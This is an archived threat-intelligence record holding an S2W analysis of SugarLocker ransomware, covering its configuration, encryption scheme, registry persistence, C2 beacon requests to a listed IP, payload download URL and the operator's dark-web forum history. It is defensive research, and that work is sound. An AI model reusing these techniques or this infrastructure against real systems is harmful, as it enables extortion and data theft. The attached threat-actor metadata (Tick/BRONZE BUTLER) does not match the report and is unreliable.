{ "id": "f4d108c6-8372-4589-922a-c75161bdd803", "created_at": "2026-04-06T00:21:59.91957Z", "updated_at": "2026-04-10T03:36:13.800881Z", "deleted_at": null, "sha1_hash": "e49d8dfcaba05b4e72e415f6360e917c60b33797", "title": "Tracking SugarLocker ransomware \u0026 operator", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3624110, "plain_text": "Tracking SugarLocker ransomware \u0026 operator\r\nBy S2W\r\nPublished: 2022-02-18 · Archived: 2026-04-05 22:03:48 UTC\r\n15 min read\r\nFeb 17, 2022\r\nAuthor: S2W TALON\r\nLast Modified : 2022.02.17.\r\nPress enter or click to view image in full size\r\nPhoto by Olen Gandy on Unsplash\r\nTable of Contents\r\n1. Executive Summary\r\n2. SugarLocker Detailed Analysis\r\n3. History of SugarLocker Ransomware\r\n4. DDW activity of SugarLocker ransomware operator\r\nExecutive Summary\r\nThe user “gustavedore” who operates the SugarLocker ransomware started RaaS activities in November 2021 and is\r\nlooking for partners at RAMP, a dark web forum focused on ransomware.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 1 of 23\n\nThe partner recruitment article written on the RAMP forum introduces the following:\r\nCurrently, the team mainly attempts to attack through networks and RDP (Remote Desktop Protocol).\r\nRecruit only those who can start working immediately\r\nNo attacks on any CIS (Commonwealth of Independent States) countries except the Baltic States and Poland\r\nProposed profit-sharing ratios as below\r\n- Initially: 70% (partner)/30% (SugarLocker)\r\n- After 5 successful corporate attacks: 75%/25%\r\n- Weekly earnings of $200k: 80%/20%\r\n- Weekly earnings of $1M: 85%/15%\r\n- Monthly earnings of $5M: 90%/10%\r\nSugarLocker (also known as Encoded01 ransomware) is written in Delphi and offers more options than other RaaS\r\nofferings. So far, no connection with other known ransomware groups has been confirmed. Their ransom note followed\r\nREvil’s, and their negotiation page followed CLOP’s.\r\nSupport for 3 execution parameters\r\nData obfuscation with custom encoding and encryption algorithms\r\nIt has the characteristics of RaaS with customizable setting information.\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 2 of 23\n\nProvides 3 file encryption algorithms of varying speeds (SCOP, RC6, Salsa20)\r\nProvides 2 key encryption algorithms (RSA, ElGamal)\r\nDownload Tor browser from external URL and create a shortcut file\r\nAs a result of hunting for the SugarLocker ransomware, it is presumed that the operator has been producing\r\nSugarLocker ransomware since at least early 2021. It seems that ransomware has actually been distributed since the\r\nsecond half of last year, but no attack cases have been confirmed so far. They do not operate a data leak site, and it\r\nseems that the ransomware name has been changed recently, so it does not appear to be active yet.\r\nHowever, the ransomware functionalities were continuously updated until the end of last year, so it looks like they’re\r\ngoing to start full operations once partners are successfully recruited.\r\nSugarLocker Detailed Analysis\r\nFile Information\r\nMD5: 1cc5b508da9567f032ed78375bb45959\r\nSHA-1: c31a0e58ae70f571bf8140db8a1ab20a7f566ab5\r\nSHA-256: 315045e506eb5e9f5fd24e4a55cda48d223ac3450037586ce6dab70afc8ddfc9\r\nCreation Time: 2021–09–04 18:00:27 (UTC)\r\nFile type: x86, exe\r\n1. Supports 3 command-line arguments\r\nThe latest SugarLocker ransomware currently supports three arguments. Among them, the -data argument does not use\r\na separate encryption key for each infected device but uses the same encryption key for all in the entire network. In this\r\ncase, it is possible to decrypt all infected devices using one recovery tool.\r\n2. TokenVirtualizationEnabled\r\nDisable UAC virtualization by setting the TokenVirtualizationEnabled value of the current token to 0.\r\n3. Custom encoding and encryption algorithm\r\nSugarLocker uses a custom encryption algorithm to encrypt strings and data. The custom encoding algorithm is mainly\r\nused when leaking information to a server or storing it in the registry.\r\n4. Configuration\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 3 of 23\n\nInside SugarLocker, 22 detailed options are stored as follows. Most settings can be set separately by an attacker when\r\ncreating ransomware, but values such as infrastructure information and public key information such as ONION_URL\r\nand C2_IP cannot be modified.\r\n5. Generate infected device ID\r\nFor the purpose of classifying an infected device, an ID is created by combining specific values. The hex value of the\r\ndata combining all three values below is generated as an uppercase MD5 hash, and the first 12 digits of these are used\r\nas the ID value of the infected device. If the creation fails, the ID value is set to “unk”. Thereafter, two additional ID\r\nvalues are generated using this value.\r\nSerial number of the physical drive (PhysicalDrive0)\r\nOperating system installation date (InstallDate)\r\nComputer name (GetComputerNameW)\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 4 of 23\n\n6. Back up important data to a specific registry\r\nIn the HKCU\\SOFTWARE\\ path, a path using the string of [ID1] is created to back up important data. Each key backs\r\nup the following data.\r\nPress enter or click to view image in full size\r\n7. Generate File Encryption Key\r\n(single mode) When generating a different file encryption key for each PC, the key is created by combining random\r\nvalues generated by the following 7 different ways with “|”. 4 MD5 HASH strings are combined to create a 128-byte\r\nstring. After that, this value is stored in the “2” registry as custom encrypted.\r\nID: 12-digit infected device ID (ID3)\r\nTICK: System tick count (GetTickCount)\r\nRAN: Random number (Random in Delphi using LCG)\r\nGEN: Cryptographically random numbers ( CryptGenRandom)\r\nCOUNT: Performance Counter ( QueryPerformanceCounter) + Current time\r\nCURSOR: Y-axis and X-axis of the current mouse cursor\r\nTIME: Current time\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 5 of 23\n\n(network mode) When FLAG_NetworkMode is enabled, SugarLocker encrypts files in network mode and encrypts all\r\nfiles of devices in the entire network with the specified encryption key. -data parameter or file encryption key delivered\r\nto a specific file is extracted and used, and the extraction process is as follows. If the -data parameter does not exist, the\r\nkey is read by referring to the cmd.txt file in a specific path in the infected device. For this, before execution, an\r\nattacker must separately create a file in one of the paths below.\r\nPress enter or click to view image in full size\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\cmd.txt\r\nC:\\Users\\[Username]\\Appdata\\Local\\cmd.txt\r\nC:\\cmd.txt\r\n8. Collecting infected device information\r\nfid field refers to PubkeyMode and FileEncryptionMode, and encryption-related data is encoded with a custom\r\nencoding algorithm, and all finally combined data is encoded in the same way. After that, this value is stored in the “4”\r\nregistry as custom encrypted.\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 6 of 23\n\nPress enter or click to view image in full size\r\nAmong them, the IP of the infected device is collected in the form of sequentially accessing the following 5 IP whois\r\nsite and parsing the IP.\r\nhttps://whatismyipaddress.com\r\nhttps://www.ip2location.com\r\nhttps://www.whatismyip.com/ip-address-lookup/\r\nhttp://checkip.dyndns.org\r\nhttps://get.geojs.io/v1/ip/geo.js\r\n9. Create mutex\r\nIf the FLAG_Debug option is disabled, a mutex is created and duplicate execution is checked. If the SugarLocker\r\nprocess has already been running, the current process is terminated.\r\nMutex name: [ID2]\r\n10. Register in the registry to automatically run after booting\r\nIf the FLAG_Autorun option is enabled, the SugarLocker is executed every boot by registering the current file path in\r\nthe registry below.\r\nPATH: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nKey: [ID2]\r\nValue: [Current path]\r\n11. Infected device information leaked to the IP of the C2 server\r\nBy creating a thread, the information of the infected device is sent to the C2 server every 15 minutes. The difference is\r\nfrom 8. Collecting infected device information is that encryption-related fid data is not sent, only the pre-infection\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 7 of 23\n\nstatus and encryption mode. In case of successful transmission, a message encoded with a custom encoding algorithm\r\n“200” string is received from the server. Additional actions such as receiving data and executing commands are not\r\nimplemented.\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4\r\nHost: 179.43.160.195\r\nContent-Length: [Data Length]\r\nCache-Control: no-cache\r\n12. Download the Tor browser to access the negotiation site\r\n1) First, to create a Tor browser directory on the desktop, the desktop path is collected according to the Integrity Level\r\nof the current token.\r\nSystem Privileges: Finds user logon sessions and collects the user profile path\r\nOther Privileges: Collect DESKTOP path with SHGetKnownFolderPath API\r\n2) After that, access the download URL to download additional files.\r\nDownload URL: http://cdn2546713[.]cdnmegafiles.com/data23072021_1.dat\r\nGET /data23072021_1.dat HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4\r\nHost: cdn2546713.cdnmegafiles.com\r\nCache-Control: no-cache\r\n3) Then, the 16-byte MD5 value at the top of the file is compared with the MD5 hash of the rest of the data to verify\r\nwhether the file has been downloaded successfully. If verification fails, re-download and verify every 5 minutes.\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 8 of 23\n\n4) When the file encryption is finished, the downloaded file is stored in the path below.\r\nC:\\Users\\[Username]\\Desktop\\browser\\browser.zip\r\n5) After that, verification is performed in the same way as 3), and the data encrypted with a custom encryption\r\nalgorithm is decrypted by designating the upper 16 bytes of the lower data as a key.\r\n6) It reads data of 0~3 offset and 4~7 offset of decrypted data and compares it to see if it is smaller than 0x11E1A300\r\n(300MB), respectively, and performs additional action only if both are small. The data of 0~3 offset represents the size\r\nof the compressed file, and the data of 4~7 offset represents the data size after decompression.\r\n7) Decompress the lower data using aPLib.\r\nPress enter or click to view image in full size\r\n8) The extracted data is saved in the structure of [File size][File path][File data], and all data related to the Tor browser\r\nare stored.\r\n9) Finally, connect to the negotiation page by inputting the firefox.exe file name and negotiation page URL as\r\nparameters as shown below. The infected device information at this time is the same as the value stored in the “4”\r\nregistry and ransom note.\r\nC:\\Users\\[Username]\\Desktop\\browser\\firefox.exe –allow-remote [ONION_URL]?data=[Infected device informati\r\n10) Create a shortcut on the desktop to run the above command line.\r\nFilename: SUPPORT (TOR_BROWSER).lnk\r\n13. Create a trace file in the temp path\r\nJust before performing file encryption, one TXT file is created in the %temp% path and the string “0” is stored.\r\nFilepath: C:\\Users\\[Username]\\AppData\\Local\\Temp\\run_[Current Time].txt\r\n14. List excluded from encryption\r\nEncryption is performed on all files except for folders, files, and extensions that are excluded from encryption targets\r\nspecified in the malicious code. In addition, an option to perform encryption only for specific file extensions when\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 9 of 23\n\ngenerating ransomware is included. The default value is *.*, which targets all files.\r\n1) Paths excluded from encryption (7 total)\r\nPress enter or click to view image in full size\r\n2) Files excluded from encryption (4 total)\r\nPress enter or click to view image in full size\r\n3) Extensions excluded from encryption (12 total)\r\nPress enter or click to view image in full size\r\n15. File encryption\r\n1) In the case of SugarLocker created in debug mode, file encryption is not performed because the FLAG_Debug\r\noption is enabled.\r\nGet S2W’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\n2) SugarLocker encrypts files on local drives and removable drives by default. Also, by creating a separate thread that\r\nencrypts the current user’s desktop path, the priority is increased to perform encryption. When executing, if the\r\nparameter -net=0 is not included, encryption is also performed on network shared drives.\r\nLocal drive\r\nRemovable drive\r\nNetwork share drive\r\nDesktop\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 10 of 23\n\n3) When encrypting the network drive, the target network drive path is logged and encrypted by classifying the\r\nresource type through the DisplayType of the network resource as shown below.\r\nPress enter or click to view image in full size\r\n4) A target file is selected by referring to the list and file properties collected in 14. List excluded from encryption for\r\neach encryption target path. As the file properties are to be compared, encryption is not performed if the file properties\r\nrelated to the local drive are mainly applicable.\r\nPress enter or click to view image in full size\r\nFILE_ATTRIBUTE_RECALL_ON_OPEN\r\nFILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS\r\nFILE_ATTRIBUTE_OFFLINE\r\nFILE_ATTRIBUTE_NO_SCRUB_DATA\r\n5) A file search thread is created for each drive, and when a file to be encrypted is identified, a thread that performs\r\nencryption for each file is created and executed.\r\n6) Only up to 100,000 files are encrypted for each folder, and if it exceeds that number, no longer encrypted.\r\n7) If the file to be encrypted is larger than [MAX_FILE_SIZE]MB, encryption is not performed. For files smaller than\r\nthis, all data is encrypted in units of 0x4000.\r\n8) A total of 3 file encryption modes are supported, and the mode actually used is selected according to\r\nFileEncryptionMode. This is distinct from other ransomware that provides up to 1 or 2 file encryption modes, with\r\neach mode providing different encryption strength and speed. Also, according to each mode, the encryption key is\r\ngenerated in 7. Generate File encryption key is cut to an appropriate size for usage.\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 11 of 23\n\nSCOP: The upper 0x30 bytes are used as the encryption key.\r\nRC6: The upper 0x30 bytes are used as the encryption key.\r\nSalsa20: The upper 0x28 bytes are used as the encryption key.\r\nPress enter or click to view image in full size\r\n9) After completing file encryption, 104 bytes of additional data are appended. This data includes its signature (“ctSb”),\r\noriginal file size, and checksum value of original file data, and all other values are fixed and stored.\r\nPress enter or click to view image in full size\r\n10) Then, the encrypted file is saved by adding the .encoded01 extension to the existing extension.\r\n11) A ransom note file is created in every folder browsed.\r\nRansom note filename: BackFiles_encoded01.txt\r\n16. Execute ransom note\r\nThe desktop path is collected in the same way as the 12. Download the Tor browser to access the negotiation site.\r\nAfter that, a ransom note is created with the following path and contents, and a notepad.exe process is run to view it.\r\nRansom note file path : C:\\Users\\[Username]\\Desktop\\BackFiles_encoded01.txt\r\n[+] Whats Happen?[+] Your files are encrypted, and currently unavailable. You can check it: all files on\r\nHistory of SugarLocker Ransomware\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 12 of 23\n\nThe latest version of SugarLocker confirmed to date (January 10, 2022) is 1.0.6, and versions 1.0.5, 1.0.4, and 1.0.3\r\nhave been secured through additional hunting. From version 1.0.4, the number of execution parameters was added one\r\nby one as the SugarLocker version went up, and from version 1.0.5, a logging function to check whether malicious\r\nbehavior was performed successfully was included.\r\nPress enter or click to view image in full size\r\nPacking to bypass vaccine detection was applied since version 1.0.3, which is the lowest version of the obtained\r\nsamples, but it was confirmed that the time of compilation of the packed SugarLocker was different for each version.\r\nThe compile timestamp of the actual unpacked samples are all set to the Delphi default timestamp, June 19, 1992, so it\r\nis impossible to check the exact production time, but the compile timestamp of the packed sample is different for each\r\nversion. The differing timestamps suggest that the SugarLocker ransomware production started at least before February\r\n2021.\r\nPress enter or click to view image in full size\r\nLast year, the total number of SugarLocker samples obtained through VirusTotal is 112, and the earliest uploaded date\r\nis November 6, 2021. At that time, the uploaded sample was confirmed to be the latest version 1.0.6, and the interesting\r\nthing is that 109 SugarLocker samples were uploaded on November 25, 2021, and among them, versions 1.0.3 to 1.0.6\r\nwere evenly uploaded.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 13 of 23\n\nAmong 112 samples, the statistics for each version are as follows.\r\nPress enter or click to view image in full size\r\nMost of the 112 samples collected last year were packed and were normal PE files. However, most of the 141 samples\r\ncollected this year were version 1.0.6, but these were not packed and were broken PE files.\r\nInterestingly, many of the samples started uploading these files to VirusTotal on February 2nd, which is the date\r\nWalmart posted an analysis of SugarLocker. In addition, messages from the operator were not there before suddenly\r\nbegan to include in the malware. It seems that the operator distributed this dummy malware to disturb analysts after the\r\nanalysis report was released. Below is the operator’s message contained within SugarLocker.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 14 of 23\n\nAmong 253 samples, the statistics for each version are as follows.\r\nDDW activity of SugarLocker ransomware operator\r\nThe user “gustavedore”, who is the operator of SugarLocker, has been active in RAMP ever since he first posted on\r\nNovember 11, 2021, on the RaaS bulletin board of the RAMP forum. Recently, it seems that the ransomware name has\r\nbeen changed from SugarLocker name to Andropov. He wrote it in three versions: Russian, English, and Chinese.\r\nWe found out that he was active on XSS about two years ago and used the nickname “JimJones” on the Exploit\r\nforums. At the time, he didn’t seem very interested in ransomware. Currently, he uses the nickname “GistaveDore” on\r\nthe Exploit forums.\r\nHe was primarily active on the Exploit forums and spoke Russian. On July 30, 2020, he suddenly announced that he\r\nwould start developing ransomware in C++. On August 8, he was also looking for Pentester. Later, on September 2, he\r\ntried to recruit two developers for ransomware. He mentioned that he also pays for an office and salary. On December\r\n23, he tried to get investors in their market services.\r\n1. May 25, 2020: Posted a developer advertisement on the Exploit forum.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 15 of 23\n\n2. May 29, 2020: Posted a developer advertisement on the XSS forum.\r\nPress enter or click to view image in full size\r\n3. July 30, 2020: Posted that he would code a ransomware affiliate program\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 16 of 23\n\n4. December 23, 2020: Looking for an investor to invest or promote in their services\r\nPress enter or click to view image in full size\r\n“magtest.tk” domain information\r\nPress enter or click to view image in full size\r\n5. May 27, 2021: First post uploaded to Exploit with a new nickname “GistaveDore”\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 17 of 23\n\n6. November 04, 2021: Joined RAMP, a dark web forum related to ransomware\r\nPress enter or click to view image in full size\r\n7. November 11, 2021: Uploaded the first collaborator job posting to the RAMP forum, a dark web\r\nforum related to ransomware.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 18 of 23\n\n8. November 11, 2021 ~ January 22, 2022: Uploaded collaborator job postings on the Freelance board\r\nof RAMP forum\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 19 of 23\n\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\n9. January 08~09, 2022: Ransomware renamed from SugarLocker to Andropov\r\n10. February 11, 2022: Suddenly posted Android Loader advertisement\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 20 of 23\n\n11. February 11, 2022: Also showing interest in another area, NFT\r\nPress enter or click to view image in full size\r\nConclusion\r\nThe latest version of SugarLocker ransomware found so far is 1.0.6, and there is a possibility that the function\r\nwill be continuously improved in the future because the code in the ransomware is still incomplete.\r\nGiven that it offers more customized options than existing RaaS, it appears that the new group is putting a lot of\r\neffort into its customization features to recruit new partners.\r\nAlthough the ransomware is still unfinished, we need to be able to respond to it in advance as it can become\r\nactive once partners are successfully recruited.\r\n“gustavedore” appears to have originally come from a developer rather than a RaaS operator, but has recently\r\nchanged his business to RaaS. And now he seems to be focusing on Android and NFT rather than RaaS. (Is the\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 21 of 23\n\nrecruitment not going well?)\r\nReference\r\nhttps://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb\r\nhttps://id-ransomware.blogspot.com/2021/11/encoded01-ransomware.html\r\nAppendix A.\r\nSugarLocker’s SHA256 hashes and configuration\r\nhttps://docs.google.com/spreadsheets/d/1er3vNUYAWR60f_OL67ewJloYVGkWHNYMTESlhDawXS4/edit#gid=0\r\nAppendix B.\r\nSugarLocker Negotiation Page\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 22 of 23\n\nSource: https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49" ], "report_names": [ "tracking-sugarlocker-ransomware-3a3492353c49" ], "threat_actors": [ { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434919, "ts_updated_at": 1775792173, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e49d8dfcaba05b4e72e415f6360e917c60b33797.pdf", "text": "https://archive.orkl.eu/e49d8dfcaba05b4e72e415f6360e917c60b33797.txt", "img": "https://archive.orkl.eu/e49d8dfcaba05b4e72e415f6360e917c60b33797.jpg" } }